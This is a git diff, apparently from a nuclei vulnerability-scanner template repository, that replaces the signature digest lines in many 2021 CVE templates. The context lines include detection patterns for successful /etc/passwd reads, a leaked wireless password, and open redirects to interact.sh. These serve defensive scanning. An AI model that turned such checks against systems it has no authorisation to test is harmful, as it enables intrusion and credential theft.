digest: 4a0a00473045022059bc9409b624bd2fd5362d10147b4ff3692432ddd8a6d62a9ac14b6ea24099d4022100a5442797861b68ea2bb22269612ec1d14085627ae5c069ea7f4dfbc8e27538f7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c278ff44a5edb5941c51c54d08a87c9e5715bcb747927c156173732cc5013181022100f5c519832045cbea7609a82df38c1229cbbd2cb2c5a612e4fd8a8fad3c2be799:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml index ab599d35ec..53a4072ea9 100644 --- a/http/cves/2021/CVE-2021-28377.yaml +++ b/http/cves/2021/CVE-2021-28377.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220708e85813042c6ebac508332d6c881dad951cdca05c670477b484d5958dd549b02206c032d04f54739bd89937beb8214e3be8dffcf8194d9cd37fb43275243f402f5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e55c8d9731415dc6ea9886d2fa440439505daf55e759a10cb5969e9099e1633302205c875f70970d91d8e3898c28e6ad8f3e5afe7ac71fa5d47201b6698e822c012d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28419.yaml b/http/cves/2021/CVE-2021-28419.yaml index 64b896ad40..4f033aeca9 100644 --- a/http/cves/2021/CVE-2021-28419.yaml +++ b/http/cves/2021/CVE-2021-28419.yaml @@ -56,5 +56,4 @@ http: - 'status_code_3 == 200' - 'contains(body_3, "Overall Report Summary")' condition: and - -# digest: 4a0a004730450221009f32215b3af91d50a0baab5c321c0f7eaafb3a0a5180ee8a7d44b3c47006d9a702205e661269ad131f07b82b826d7e35e403f63398faf78e1609ac4dd769995dc2e2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022016d173a0bc91f0c26b3b6cac1e264666e4ef24dcaf931948d088be86c5f4889b02210081d48cd34f0ef2ae8183ba1701fdeab110b7ae242e6fa505fe8570b0da5e13a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28918.yaml b/http/cves/2021/CVE-2021-28918.yaml index 888dd7c9f9..5053daeed0 100644 --- a/http/cves/2021/CVE-2021-28918.yaml +++ b/http/cves/2021/CVE-2021-28918.yaml @@ -49,5 +49,4 @@ http: - type: regex regex: - "root:.*:0:0:" - -# digest: 4b0a0048304602210083164a58208fafcc78ac84d7129b8c95125bb5029259d98ab3cdabcd759ddea4022100bb8158c5a6724f9243c076711d1b7e01afbb03092786683a25b308715b3b0422:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022051a7e1e302c99ea9e56476ca55b45aa25bc6de2eb9c4106015d7cd9357ce1eaf022100e0d6eeb7adaf7bc7516f3ba87aab0206840b0baecc2d5cd2fa32db95aa56dc3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml index e5ae0ad97d..ebd6aee736 100644 --- a/http/cves/2021/CVE-2021-28937.yaml +++ b/http/cves/2021/CVE-2021-28937.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220173572c4393ed8e608e8147866cba0407f7db8db64d510c8f82e0974d781689c022052a33322abb1f705be6ab989539e20e40399f3375ee01c6248fcbe910100092f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cad3f276c9d91b80890e666acca5889e269155b46ae1cd790b0684585313ec3b0220300b5b1086df5c8fae38939d5437a355d9721df3c5a448d70d31398f65074343:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29006.yaml b/http/cves/2021/CVE-2021-29006.yaml index d0877f600f..88505ea30b 100644 --- a/http/cves/2021/CVE-2021-29006.yaml +++ b/http/cves/2021/CVE-2021-29006.yaml @@ -59,5 +59,4 @@ http: part: header_3 status: - 200 - -# digest: 4b0a00483046022100c1f2aaa7e7fc7313ffd1af596a154ade7c9ddca104266c07c31cd15731e0a8f90221009cd614bee8fe51b8218ebca6a0117e6caff44137bcd01b5e49faa54df3a1ee59:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203bb491de0593cedf9d2df4c23afab91016a73c9c57f0afbe7cc6c76e964288a402206032da7cdc24caba5b898751576df6ce5341376e8c21faff69ffaf02a4bf601f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml index d234c21cca..1243bbde98 100644 --- a/http/cves/2021/CVE-2021-29156.yaml +++ b/http/cves/2021/CVE-2021-29156.yaml @@ -36,5 +36,4 @@ http: - type: dsl dsl: - 'contains(body, "jato.pageSession") && status_code==200' - -# digest: 4a0a0047304502204d25a65f6d8689cb4b4963c14466d1bd785634600d4022a14c59365a38f6af360221008167eb7b03a629e3eb13c5b7aa0faf339a6292fdfbaba0ee6b0baf05abe97642:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022019b0a4b956853d955d144e1e414d8e49041ad2173081bec47566251d0877d14b0220143100e066ad06a72b31773edf76cd517b8a5bc27ce7762cd40f2167ab9fe73d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml index 4d8f9c6ded..9b23e963ec 100644 --- a/http/cves/2021/CVE-2021-29203.yaml +++ b/http/cves/2021/CVE-2021-29203.yaml @@ -59,5 +59,4 @@ http: - type: status status: - 201 - -# digest: 490a00463044022073d0795be1b222a49ce81ea1a141ec88e4857a1591c45cce58d441175de3a79a02201c4b22a3647646ae31860e909cef9158b1898dba34b310604fd3754af1d97ec2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cfeae903b4ebd9841bf8ea69cec9ac9de71d711c4d6e80192c888f181f6d6e2b0220030306b58aa5583c9286abb589e0f47b872d90e15ecc4e7da2471d1953ec237d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29441.yaml b/http/cves/2021/CVE-2021-29441.yaml index fad09590e3..4d1f497eb9 100644 --- a/http/cves/2021/CVE-2021-29441.yaml +++ b/http/cves/2021/CVE-2021-29441.yaml @@ -65,5 +65,4 @@ http: part: header words: - "application/json" - -# digest: 4a0a00473045022100f04bc6956e5c34520b6e2f70b85f724dff409a12f46f07c38b25bb508f299242022027089f63edf64c4de58d9348a38a81378c154a0fb66baf506adb8de67fd0372f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a78e87b346a9404f6561c8c37e5680dd5f5fb5b204d87b05baa3538135e1170302204f6bb14743715a1f3012d7f6d931d1c030abd5c570dcee81ab0b050aa8de44d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index e3c684d688..60c62002bf 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201eb1f856e55f274936a02ee60726c9eaa6a754de7bd687805d6d299eeb20fa8d022100c4dd7041f3b620623fed5cccdb88ddb23266161e705c2672d92e8d34e1091865:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d9d4b0b6a390da6b27e0552d309eeadbb4419da64c0fdaa33eb577860869a20c022065453f5063004878bf15a4984e21c83bdbd54beee0bc3c4b9fe3fdbb35a7db61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29490.yaml b/http/cves/2021/CVE-2021-29490.yaml index f9d4ed8385..2b05b9dff4 100644 --- a/http/cves/2021/CVE-2021-29490.yaml +++ b/http/cves/2021/CVE-2021-29490.yaml @@ -38,5 +38,4 @@ http: part: body words: - "

Interactsh Server

" - -# digest: 490a0046304402207e6dbe71fd773f58cfe872aa19bbfa10daac09a499f84662b55cac04ea6c5fa8022079f73e171978ca00631273dba96edf6ab71be8abb94e7d14ae88b90539f1d5cc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210091007335921ad365b8926db4118b3964300a2c172c0dad97f94916717013e87902207be6de6a6d3fc71adeaad44eaa4bf1f8afda834827545db5ccc8efcca14a3611:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29505.yaml b/http/cves/2021/CVE-2021-29505.yaml index f064919384..0a0760ba3a 100644 --- a/http/cves/2021/CVE-2021-29505.yaml +++ b/http/cves/2021/CVE-2021-29505.yaml @@ -112,5 +112,4 @@ http: - type: status status: - 500 - -# digest: 490a00463044022070e6ede36eca1470add4cdccaf3d60d373b0c258f85be55fc9db86ced795d41302206f5a6c38a4b454172205f8ea123310f4217909d66e5aa8320a0b23ace9dc66de:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c18babb8e412f28bc512bc3e4afc711f159510a24ed33420806a2c6dc63006e302203dc78c82d2d668c6456fb2114f91599f779f0a60fe0863610c9a6125e08fc948:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml index 9e87a41a9e..2229d2be0c 100644 --- a/http/cves/2021/CVE-2021-29622.yaml +++ b/http/cves/2021/CVE-2021-29622.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4a0a00473045022100ccb952172d51f04458a1273f39b52a14722d12174e425d203583478c1b6f0f0d022033a4714dbf9d324c7c4ad3b2da6443042da31280a4f1e09d61139105d188f453:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022034f9e5ffe27001e27919da999d94363691fa1f635243eeb0dd21eef87e98e85302203f25faa9e89e0947889d757fcd2869d3756e5fbfefb101f8b918e6c972d35dc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index aefcb460f9..b7538b5a6e 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a94f858148e4b734cbabc3d8fd35ac0d2879ab32a39bb60e65a100c327721cff022100bebaa430e396e6dad28989b9eed6efc6d5ccef1c1281efdd201aa95a4ef56bff:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ca7303d8747f0e508ce7389cdc9725e53cfcf2a8b5d4aedcabdda076331d6d9502202ef6f3e42aa00ab63ba7b0b643496bce9d95752e6d09773947c9223f29ae4105:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index df1d8b2949..3bd3e59bda 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008d4c5269f84bf8573adf0ba9c775e3e38c42b353cbbabd836616e7370633a151022100bf8a67b18456cf7ab238508bf31847833a98ec5d27596f8629bba5df0b973cac:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205e9fb745925afbdb491d6cdb7987bd557d34e51dec08d40bfe94336bc82535a6022026035502032dbe91abf38745826661b039341179cdfb714aecd691d6effd885a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml index 946f0b24ce..2f639fd1a4 100644 --- a/http/cves/2021/CVE-2021-30049.yaml +++ b/http/cves/2021/CVE-2021-30049.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022043ff2dfaa894a27e8f3b0be174504d5150172d0dc4318e475e11d0b1cca5b10e022100bea9a8da25cd5b4a3cfe59f5e491bdbf7fd17bc0064fe3cb2ac5749cb68c303a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009fe251a84444fa94bff41a2bf55dd1ac9be19976914be4ad0f78f84039011a31022100cf9ab11ada6604aeec26ca83d990192a8beffadd8313763ace7bee7d5e85ad0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml index c873a4d013..038c4c1fcf 100644 --- a/http/cves/2021/CVE-2021-30128.yaml +++ b/http/cves/2021/CVE-2021-30128.yaml @@ -65,5 +65,4 @@ http: part: body words: - 'value="errorMessage"' - -# digest: 4a0a00473045022100ea7c77e21cb5ea0cea94cd32f9c965eff116e06b33446c1a9ea623625d9c0bf8022064bbdca159a81db182098bbac85a442994c5471a37e490633576564f45308006:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009582cacef28b43bafe5d36f6b8a3dc96decde33c788a39eeeb633651aa4f6a5d022100e58c6337fe308212f2e731d47460de13570b3e28a002caabb3ab2f776f3eac53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30134.yaml b/http/cves/2021/CVE-2021-30134.yaml index 896b37f619..00b6d81a75 100644 --- a/http/cves/2021/CVE-2021-30134.yaml +++ b/http/cves/2021/CVE-2021-30134.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100cce13e8a09e2d7a40b76d7ceaf401b8771109cea1b4db9b08320cac7f5a57ca50220313b3afc8f5c107af42153b2469c3b474f483d37febe486ef5c33c99d9be63c0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ec0da04b4f58787b4dd25f70be6fe120f8e3245496ac55ace70de0e18fe151700221008f2c87dea83cdb623ef8d49444d0c10855bd4ab70260be5250d313ab553e1254:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index dfcee2aca7..48cfd72a50 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100fb84ebfa8b8161f03509913ad85863f36e31ed5bfe74881e05436d54488655e602204606faa7862da958c942acd1c847cde5f4e4370138d5ab95e7e5f132d4942928:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b0a2f5fc184afd3f104531a998867029ceaa12cd37442d62fa648c40fd6ef73a0221008a2a160cd40574a26228b6ccda4d408ae735bb28ecab7787044602689207587d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3017.yaml b/http/cves/2021/CVE-2021-3017.yaml index 18095bc6b0..c35b39c432 100644 --- a/http/cves/2021/CVE-2021-3017.yaml +++ b/http/cves/2021/CVE-2021-3017.yaml @@ -46,5 +46,4 @@ http: regex: - 'def_wirelesspassword = "([A-Za-z0-9=]+)";' part: body - -# digest: 490a004630440220782d26350c6170653deeea6ab4fa12c44244136726eda684b216b65a84b121a702206313756efea893a6eaf76620598be3c0543e732dc14850d63ba146536d2a49e3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200131eba27813659e0447b4d9604d845ae6d98a9cd310641c56f54f4190f289a2022100d32d14c8d4e8af70f1878809412dafc2cf37c18ea53ea583c0f52d9b5401c1c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml index f85581ec42..96b4221a36 100644 --- a/http/cves/2021/CVE-2021-30175.yaml +++ b/http/cves/2021/CVE-2021-30175.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ecfc4e49d4f98beef8bad0e667c6c9e9a6df0c1d41d5a2abd2560278ac348089022100ac3a19dc9f469c83402199304d7a1685868781bfa75f93b6d9efce0fa190ae4a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100895e248042ae7a20b0c6677a9c7f047ca6671f12470da3e6e5efcd247610179402202a738290b750e13cdd7b807005fb7cb433add389df7fe89a487786b9751275da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml index ad82762882..a399988355 100644 --- a/http/cves/2021/CVE-2021-3019.yaml +++ b/http/cves/2021/CVE-2021-3019.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f33cd61a5beeb44d10512980530215d49003b2db5f3b431b92b99e0a82e65d00022100cbb2cd7d58b9d589edda852cf3c937197952dbcf25e9f4d6e523326766923e37:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206774edd9910a5704305ba2d2cd42c7b105bac596505714c9bc00c447a3088876022100b19e8228eaffdc0366b60ff4fb24ce5378655c277ba6a23fffc12324f5268645:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-30213.yaml b/http/cves/2021/CVE-2021-30213.yaml index ac12a55eee..0db55a7337 100644 --- a/http/cves/2021/CVE-2021-30213.yaml +++ b/http/cves/2021/CVE-2021-30213.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f5031a00484ae955a501d87bb131251b16e9f8c18fa492fa3909def92edb6da1022100f15eb4454ab5f66117069091275b004b22d351ffbbe36c5c09df6110240900fc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a4818a55bb72c458f1d4225aec0bae7a309580eb97c1d160d4a4cfa6629b49a802203b91dcd69e2365dbf8afa8482615b3707735cc01d7702d866ec8c9cd3bfd3839:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3110.yaml b/http/cves/2021/CVE-2021-3110.yaml index 1ef76b3be9..cac784021a 100644 --- a/http/cves/2021/CVE-2021-3110.yaml +++ b/http/cves/2021/CVE-2021-3110.yaml @@ -42,5 +42,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "average_grade")' condition: and - -# digest: 4a0a00473045022055099ecbd231d4f5e6e774c159e0de3943a49c65345e76eec620f7f42d52bf66022100d0fb624b26651775c15254f5914473212f58a1e05f85215f717ce6311fd6e3de:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ec75b3e26d757db6ab75f15faa44fb4bee32db4160fd3a24332ca0357d86f5df022100d40930ad8d140a41f85a4d086d827469ff532f374bad446f16a19a4776c45e0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31249.yaml b/http/cves/2021/CVE-2021-31249.yaml index eec352cd6a..8320bd5b97 100644 --- a/http/cves/2021/CVE-2021-31249.yaml +++ b/http/cves/2021/CVE-2021-31249.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 302 - -# digest: 4b0a00483046022100e051e54ab35c9af95f0a985eadfdf054c32c9e4e2559cd0b647f49f0b2180872022100e2edb37a734ca018141a8a7793f77889ec338b64920b38e26807af07a0b827d0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d11b13d22e327e6321eee2fca54b22dbbcb90e9b1429c2589adb60d5ea45fe3d022061b5cb9971da775085124b6a5a3da300ac46e8659bb99def73249a659f17b39c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31537.yaml b/http/cves/2021/CVE-2021-31537.yaml index ecd41f750f..bd0e7135b5 100644 --- a/http/cves/2021/CVE-2021-31537.yaml +++ b/http/cves/2021/CVE-2021-31537.yaml @@ -44,5 +44,4 @@ http: part: header words: - text/html - -# digest: 490a004630440220254359b599fe932ef448eed3a893e24a7b3a2dd42f3e5afad4c426fe939b47d402202523ccd8a4583d5f0bc670e8ec91e2516cd3a4ad553774659eb823588267297b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220670f23dd7f97ad3162f7a49493783b6e484b74219f6a28c747e682eb4aec6f6f022100961f8e1aa211672ed5db2d2b4c92533d8d0a46430ce65c38217d008023e01e47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31581.yaml b/http/cves/2021/CVE-2021-31581.yaml index 9a36f82d60..3e5792266b 100644 --- a/http/cves/2021/CVE-2021-31581.yaml +++ b/http/cves/2021/CVE-2021-31581.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204d216d25df3298c158a68024c931ae1f555f7c51412f2f3c627ccb53a671d45d02206282e0e3e51e4944c3d53d1bcd95d8e7e236ecdf6ab6235dbbf0f226b087c5cb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205cd2d8830194754087dd3b84a40911a27570011a61f43a3c9c4dde8e932ea7a4022100bd6066ddf0b8b79becacb46fea1897901b8bbe9151545c4529304b45bafaf8e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index 94170c4d9f..9bfafa7037 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502202f9e2176996ef0e2310a0c557b7ed58ce6f1d38ee45adad6385ecf57fa4e3dfe0221009e108f4aa4f72c76b510ca91ed430d42d657a3751ca67fa949f14b18f86a9479:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f7cf56321960517f704ff0125f620d42637686515ad6eebb2ddb0e273c6bc89502207bbb012c9ca32e0bf11b1a89c1fe735e84c3d0b1ad68f983e1baf05a0200868e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml index d84401487f..f977e9bbb9 100644 --- a/http/cves/2021/CVE-2021-31602.yaml +++ b/http/cves/2021/CVE-2021-31602.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220617b4cb88c62dd99ba1d4271cdd4add4350bdc6cdb9a139b2da91df6b6ae260b02204456cf76e8d8901b79e8717691fed3fc45bb8ea2cf9bc8b3942c1f304ab4d77f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100920e3f4bd6491fbeedd5398d4d0fe8ca70e799780b3043109b814bf4f78b02d102207224f1a466f03870330c9f878274f9b35ab089bedd83d5665048ef91b3645b5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index 299dce0ab9..a158ff247e 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100fe4d9a2922548373e45e06fe6e7ad2ca881375bacf58b16b7272a60a9f448985022100e092f7686e808b9ee00106af36f2c88890549954fa4d9b86c0d7acf21d848455:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c68c2601a2a92e1dfb0adacc99f002f99a1ed19aed441e14b82155ae0c03a1d90220012ca88c517ee4149477afd68866aa0e3d427d505b2180560c6968a9df942c75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml index 5e1186db67..e4679abea9 100644 --- a/http/cves/2021/CVE-2021-31805.yaml +++ b/http/cves/2021/CVE-2021-31805.yaml @@ -56,5 +56,4 @@ http: part: body regex: - "root:.*:0:0:" - -# digest: 4b0a00483046022100c2770f88e7aa504f14453cc20c47ba79f0bfb1505db37584121b4732a0b034ce022100b4cd8bee4bf1b726096e580e1295e78372b84a3df73ddf2ba428ed87f014236e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008f57fcf50c6fc5a4b10f2e5e46f41b91700951868ee2b745d8b97cc971246801022100aa0e1424c0814b019901ef083d5c0afa8b1751e95586aa591eaadeee8cc5b12b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31856.yaml b/http/cves/2021/CVE-2021-31856.yaml index 91737b2bff..d8b00cd843 100644 --- a/http/cves/2021/CVE-2021-31856.yaml +++ b/http/cves/2021/CVE-2021-31856.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221008a40b02326366f0dbd09757f428a38ea3ad9c80479e7ada3591933e5e0f8de49022100eb1633e346deefd79fb8a2575b55c901407ce9b610d6e3012da1c03f1df8277e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009fb45e8a8f17262d2ca83a4ed4ca4d7f45d725eddcdf8f20b280b49f1c03b63a0221008f1cc3ea63c5f114719fdabaaab095e26154883e99b576d85cc33bc4e26052a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml index e4c8b83be2..48a8005986 100644 --- a/http/cves/2021/CVE-2021-31862.yaml +++ b/http/cves/2021/CVE-2021-31862.yaml @@ -36,5 +36,4 @@ http: - '(body == "false ")' - 'status_code == 200' condition: and - -# digest: 4b0a0048304602210095b4b0362ec77dba49f819943a48ea165b7a616d7d8d6379eef21b561cbaef72022100956865f3316d306484b4b8146e02324b7ba25c0485c96365b0cc0b346b43751d:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220431efdb7da03cf39458284341e7eebdb301df13c2c50677c65280785fee34d9902201fd13f0aedad105faf6cfb7a3c546c6770d3c83aae3f738ff2177c118df1782b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32030.yaml b/http/cves/2021/CVE-2021-32030.yaml index c109ad7b7b..2d3a289664 100644 --- a/http/cves/2021/CVE-2021-32030.yaml +++ b/http/cves/2021/CVE-2021-32030.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b9578865ab3e492f784e8bd3e082a7cdcbc7234fe70f7f43eb824ca23c94032b0221008132af988c29465f7e8d4096745d61aea4a662d0dfa8cb705d1634a63a6384bc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207e0e2d865e563a8806f095096f282ca58d53cf1e281a12d93905ed9f31a539680221008a5c856ec1dd7efa7b5398c265722141e393d9ff778dcca302b09b8f916ed7c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32172.yaml b/http/cves/2021/CVE-2021-32172.yaml index 90d01d0f1f..3231bb9ad6 100644 --- a/http/cves/2021/CVE-2021-32172.yaml +++ b/http/cves/2021/CVE-2021-32172.yaml @@ -61,5 +61,4 @@ http: regex: - '"hash"\:"(.*?)"\,' internal: true - -# digest: 4a0a00473045022100ef69bae7f4271995f7788a3f12af7294b5334638a7d45b70f1674bd717e89b380220304a682122ca86af353633c12fb2a469d8f6ca146e2ba5332ed04aaf187206a6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022011f3001de54562cd4c0d9d338c4559ee562ba0195d227e0676b050b0a07958cc0221009de1a2671736c01e19233166f2433f988b0c630e3574061b312faa6afcb9e36f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml index 80b3fc30cd..c231262a86 100644 --- a/http/cves/2021/CVE-2021-3223.yaml +++ b/http/cves/2021/CVE-2021-3223.yaml @@ -47,5 +47,4 @@ http: part: body regex: - "root:.*:0:0:" - -# digest: 4a0a00473045022100cc8ddf0c4234c2739f2309aa1655e5a1ea1b83e577646e020b2e149d76642d440220554e662f83d4f712464c01eb234f9fdb5d51322247245993953be1bf01b43b2b:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022023b1dfb634018d216b9586691c0db541693a7798f6774adc93e097d0d16d34e0022070076bdebb68a1f0e529a0a866b40f7f976d5434b3de5467e6fec4daf303fbc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32305.yaml b/http/cves/2021/CVE-2021-32305.yaml index 674b4521e3..3d87e1b471 100644 --- a/http/cves/2021/CVE-2021-32305.yaml +++ b/http/cves/2021/CVE-2021-32305.yaml @@ -39,5 +39,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# digest: 4a0a00473045022055c8e0aad1ad51687fe76879f11084d6576abf21683abb93f0c42a74115dd2f4022100aaf2b801bcf1cc160e0bf6c879cb50a2a26f0f859d878a5250e75fd237fcbf4f:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022053df66035b908d5a757bc8aff4f71c1c7684296bdb20a8a060497781800183f302204b384f327e885aad2f13e63b45fc889434b700e3214242ff35501432771914d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-32618.yaml b/http/cves/2021/CVE-2021-32618.yaml index 0beb82a7d1..9b31171e33 100644 --- a/http/cves/2021/CVE-2021-32618.yaml +++ b/http/cves/2021/CVE-2021-32618.yaml @@ -35,5 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 